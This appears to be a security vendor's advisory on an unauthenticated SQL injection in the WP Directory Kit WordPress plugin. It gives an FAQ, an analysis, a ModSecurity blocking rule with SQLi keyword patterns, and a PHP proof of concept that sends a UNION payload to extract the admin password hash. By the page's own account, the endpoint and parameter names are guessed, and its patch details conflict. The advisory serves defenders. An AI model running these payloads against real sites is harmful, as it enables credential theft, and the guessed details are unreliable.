What is CVE-2026-42672?

CVE-2026-42672 is a high-severity SQL injection vulnerability found in the WP Directory Kit plugin for WordPress, affecting versions up to and including 1.5.1. It allows unauthenticated attackers to manipulate SQL queries and extract sensitive information from the database.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of user-supplied parameters in SQL queries. Attackers can send specially crafted HTTP requests to append malicious SQL commands, potentially retrieving sensitive data such as user credentials and email addresses.

Who is affected by this vulnerability?

Any WordPress site using the WP Directory Kit plugin version 1.5.1 or earlier is vulnerable. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the installed version of the WP Directory Kit plugin. If it is version 1.5.1 or earlier, your site is at risk and should be updated immediately.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the WP Directory Kit plugin to version 1.5.2 or later, which includes fixes for the SQL injection issue. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability can be exploited easily and has significant potential impact on confidentiality. It emphasizes the need for immediate action to protect sensitive data.

What are the practical risks of this vulnerability?

If exploited, an attacker can extract sensitive information from the database, including user passwords and email addresses. Although it does not allow direct privilege escalation, it can lead to further attacks on the site.

How can I mitigate risks if I cannot update immediately?

If immediate updates are not possible, consider disabling the WP Directory Kit plugin until a fix can be applied. Additionally, implement web application firewalls or security plugins that can help block SQL injection attempts.

What is the proof of concept (PoC) for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted request to a likely vulnerable AJAX endpoint. It shows how to extract sensitive data, highlighting the ease of exploitation.

What are the common patterns of SQL injection in WordPress plugins?

Common patterns include using AJAX handlers or shortcode attributes that accept user input without proper sanitization. Vulnerable queries often concatenate user input directly into SQL strings instead of using prepared statements.

How does this vulnerability affect site security?

This vulnerability compromises the confidentiality of user data and can lead to further attacks on the site. It underscores the importance of secure coding practices in plugin development and regular updates to maintain site security.

What additional security measures can I implement?

In addition to updating vulnerable plugins, consider implementing security plugins, regular backups, and conducting security audits. Educating users about secure practices can also help mitigate risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-42672: WP Directory Kit <= 1.5.1 – Unauthenticated SQL Injection (wpdirectorykit)

CVE ID CVE-2026-42672

Plugin wpdirectorykit

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.5.1

Patched Version —

Disclosed May 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42672 (metadata-based):
This is an unauthenticated SQL injection vulnerability in the WP Directory Kit plugin for WordPress, affecting versions up to and including 1.5.1. The CVSS score is 7.5 (High) with a vector string of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, indicating network exploitation without authentication or user interaction, and high impact on confidentiality. The vulnerability resides in insufficient escaping on a user-supplied parameter and lack of prepared statements in a SQL query.

The root cause, inferred from the CWE-89 classification and vulnerability description, is improper neutralization of special elements in an SQL command. The plugin likely constructs SQL queries by concatenating user input directly, without using $wpdb->prepare() or similar parameterized query methods. The description explicitly states “insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query,” which Atomic Edge research interprets as the plugin failing to escape the parameter before interpolation into a SQL string. Without a code diff, we cannot confirm the exact vulnerable parameter or query, but typical WordPress SQLi patterns involve AJAX handlers or shortcode attributes that accept numeric or string values.

Exploitation requires sending a crafted HTTP request to a vulnerable WordPress installation. Based on the plugin slug ‘wpdirectorykit’ and common WordPress plugin architecture, the attack likely targets an AJAX action registered by the plugin, such as ‘wpdirectorykit_search’ or ‘wpdirectorykit_filter’, accessible via POST to /wp-admin/admin-ajax.php. An unauthenticated attacker can supply a malicious parameter (e.g., ‘search’, ‘id’, ‘category’) containing SQL injection payloads like ‘OR 1=1 UNION SELECT …’ to extract data from the database. The attacker does not need a valid nonce or capability check, as the vulnerability allows unauthenticated access. Since the plugin version is 1.5.1, the vulnerable endpoint may be present in any exposed front-end feature, such as listing or directory search.

Remediation requires the plugin developer to apply parameterized queries using WordPress’s $wpdb->prepare() method for all database operations involving user-supplied input. For each vulnerable query, the input must be treated as a placeholder (%s or %d) rather than concatenated into the SQL string. Additionally, input validation and escaping functions like esc_sql() should be used as a secondary defense. The fixed version 1.5.2 should sanitize and prepare the parameter before execution. Atomic Edge research recommends that administrators update the plugin to version 1.5.2 or later immediately.

If exploited, an unauthenticated attacker can extract sensitive information from the WordPress database, including user credentials (hashed passwords), email addresses, private post content, and other confidential data. The CVSS confidentiality impact is rated HIGH, and because no authentication or user interaction is required, the attack can be automated to target multiple sites. While the vulnerability does not directly allow privilege escalation or remote code execution according to the CVSS vector, it can facilitate further attacks by exposing session tokens or admin credentials, potentially leading to full site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-42672 (metadata-based)
# This rule blocks unauthenticated SQL injection attempts targeting the WP Directory Kit plugin's AJAX search handler.
# It matches the specific path and action, then inspects the 'search' parameter for common SQLi patterns.

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42672 - Unauthenticated SQL Injection via WP Directory Kit AJAX',severity:'CRITICAL',tag:'CVE-2026-42672'"
  SecRule ARGS_POST:action "@streq wpdirectorykit_search" 
    "chain"
    SecRule ARGS_POST:search "@rx b(?:UNION|SELECT|INSERT|UPDATE|DELETE|DROP|ALTER|CREATE|ORs+d+s*=s*d*|'s*OR|--|#|*/|bSLEEPb|bBENCHMARKb|bLOAD_FILEb|bINTOs+OUTFILEb)" 
      "t:none,t:urlDecode,t:lowercase"

# Note: The rule uses a regex pattern targeting common SQL injection keywords.
# If the plugin uses a different parameter name or action, this rule should be adjusted.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42672 - WP Directory Kit <= 1.5.1 - Unauthenticated SQL Injection

// This PoC targets the likely vulnerable AJAX endpoint.
// The exact action and parameter names are inferred from common plugin patterns.
// Adjust $target_url to the base URL of the WordPress installation.
// The payload extracts the admin user's password hash from the wp_users table.

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// Initialize cURL session
$ch = curl_init();

// The AJAX action is likely 'wpdirectorykit_search' or 'wpdirectorykit_filter'
// The vulnerable parameter may be 'search', 'keyword', 'id', or 'category'
// We use a UNION-based SQL injection to extract data
$post_data = [
    'action' => 'wpdirectorykit_search',
    'search' => "' UNION SELECT user_pass,user_login,user_email FROM wp_users WHERE user_login = 'admin' -- "
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded'
]);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "n";
} else {
    // Display the raw response
    echo "Response from target:n";
    echo $response . "nn";
    
    // Attempt to extract the password hash if the response contains data
    if (preg_match('/[a-f0-9]{32}/i', $response, $matches)) {
        echo "Potential password hash found: " . $matches[0] . "n";
    }
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-42672?
Understanding the vulnerability
CVE-2026-42672 is a high-severity SQL injection vulnerability found in the WP Directory Kit plugin for WordPress, affecting versions up to and including 1.5.1. It allows unauthenticated attackers to manipulate SQL queries and extract sensitive information from the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of user-supplied parameters in SQL queries. Attackers can send specially crafted HTTP requests to append malicious SQL commands, potentially retrieving sensitive data such as user credentials and email addresses.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP Directory Kit plugin version 1.5.1 or earlier is vulnerable. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the installed version of the WP Directory Kit plugin. If it is version 1.5.1 or earlier, your site is at risk and should be updated immediately.
What should I do to fix this vulnerability?
Remediation steps
To mitigate this vulnerability, update the WP Directory Kit plugin to version 1.5.2 or later, which includes fixes for the SQL injection issue. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 7.5 indicate?
Understanding risk levels
A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability can be exploited easily and has significant potential impact on confidentiality. It emphasizes the need for immediate action to protect sensitive data.
What are the practical risks of this vulnerability?
Potential consequences
If exploited, an attacker can extract sensitive information from the database, including user passwords and email addresses. Although it does not allow direct privilege escalation, it can lead to further attacks on the site.
How can I mitigate risks if I cannot update immediately?
Temporary protective measures
If immediate updates are not possible, consider disabling the WP Directory Kit plugin until a fix can be applied. Additionally, implement web application firewalls or security plugins that can help block SQL injection attempts.
What is the proof of concept (PoC) for this vulnerability?
Demonstrating the exploitation
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted request to a likely vulnerable AJAX endpoint. It shows how to extract sensitive data, highlighting the ease of exploitation.
What are the common patterns of SQL injection in WordPress plugins?
Identifying vulnerable code patterns
Common patterns include using AJAX handlers or shortcode attributes that accept user input without proper sanitization. Vulnerable queries often concatenate user input directly into SQL strings instead of using prepared statements.
How does this vulnerability affect site security?
Impact on overall security posture
This vulnerability compromises the confidentiality of user data and can lead to further attacks on the site. It underscores the importance of secure coding practices in plugin development and regular updates to maintain site security.
What additional security measures can I implement?
Enhancing overall WordPress security
In addition to updating vulnerable plugins, consider implementing security plugins, regular backups, and conducting security audits. Educating users about secure practices can also help mitigate risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations